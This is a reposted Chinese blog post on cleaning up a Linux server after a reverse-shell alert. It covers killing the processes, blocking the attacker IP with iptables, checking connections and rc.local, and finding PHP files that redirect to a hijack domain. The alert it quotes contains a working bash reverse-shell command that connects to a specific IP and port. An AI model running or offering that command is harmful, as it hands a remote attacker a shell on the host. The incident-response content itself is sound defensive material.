进程异常行为-反弹Shell攻击，KILL多个进程

最新推荐文章于 2025-06-02 13:29:35 发布

转载最新推荐文章于 2025-06-02 13:29:35 发布 · 531 阅读

0 ·

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/hiit/p/11103187.html

文章标签：

#shell #awk #php

本文详细解析了反弹Shell攻击的原理，展示了如何通过进程监控发现异常行为，提供了利用Linux命令进行恶意进程清理的方法，包括使用ps、grep、awk等命令组合定位并终止恶意进程，以及如何设置iptables防火墙规则来阻止特定IP的连接，确保系统安全。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

进程异常行为-反弹Shell攻击

父进程名称：bash

进程名称：bash

进程名称：/usr/bin/bash

进程id：23,077

命令行参数：sh -c /bin/bash -i >& /dev/tcp/27.255.72.119/4451 0>&1

说明：黑客利用远程代码执行漏洞或者恶意木马向中控服务器建立反向TCP连接，连接建立后，黑客可利用该连接远程执行任意系统指令，严重危害主机安全。

解决方案：建议立即KILL该可疑反弹SHELL进程，并及时清理计划任务中的恶意代码。

看下27.255.72.119是什么鬼？

这个IP全是邪恶文件。

首先，用ps查看进程，方法如下：

ps -ef

N多反弹SHELL进程需要清理。

下面利用循环kill掉进程。

ps命令将某个进程显示出来 grep命令是查找中间的|是管道命令是指ps命令与grep同时执行 PS是LINUX下最常用的也是非常强大的进程查看命令 grep命令是查找，是一种强大的文本搜索工具，它能使用正则表达式搜索文本，并把匹配的行打印出来。awk '{print $2}' $fileName : 一行一行的读取指定的文件，以空格作为分隔符，打印第二个字段。while read line的循环中的重定向，done写在最后相当于给整个while do 语句加了一个约束条件,读取每行至文件尾。

 ps -ef | grep 27.255.72.119| awk '{print $2}'| while read line;do kill $line;done

kill 结束不掉的时候，可以加 -9,强制

kill -9 28271

查看iptables规则，包括所有的链。filter表包含INPUT、OUTPUT、FORWARD三个规则链。说明：-L是--list的简写，作用是列出规则。

iptables -L

使用 iptables屏蔽IP段

iptables -A OUTPUT -d  27.255.72.119 -j DROP

#添加屏蔽IP 
#禁止此IP访问服务器 iptables -I INPUT -s 1.2.3.4 -j DROP 或 iptables -A INPUT -s 1.2.3.4 -j DROP 
#禁止服务器访问此IP iptables -A OUTPUT -d 1.2.3.4 -j DROP 如果要封某个网段： iptables -I INPUT -s 1.2.3.0/24 -j DROP  
#清空屏蔽IP iptables -t filter -D INPUT -s 1.2.3.4 -j DROP iptables -t filter -D OUTPUT -d 1.2.3.4 -j DROP  
#一键清空所有规则 iptables -F  
#查看 iptables -L INPUT 或 iptables -L 或 iptables-save（此命令将保存规则，下次开机自动执行）

Netstat 是一款命令行工具，可用于列出系统上所有的网络套接字连接情况，包括 tcp, udp 以及 unix 套接字，另外它还能列出处于监听状态（即等待接入请求）的套接字。

netstat -tnpla| grep ESTABLISHED| grep root

cat /etc/rc.local

百度打开主网站被跳转链接了6he5566.com还弹出个QQ框，what？

find . -name "*.php" -exec grep -i  "6he5566.com" {} \;

删除这些文件，修改相应配置conf文件，修改文件目录权限，修复代码漏洞。

转载于:https://www.cnblogs.com/hiit/p/11103187.html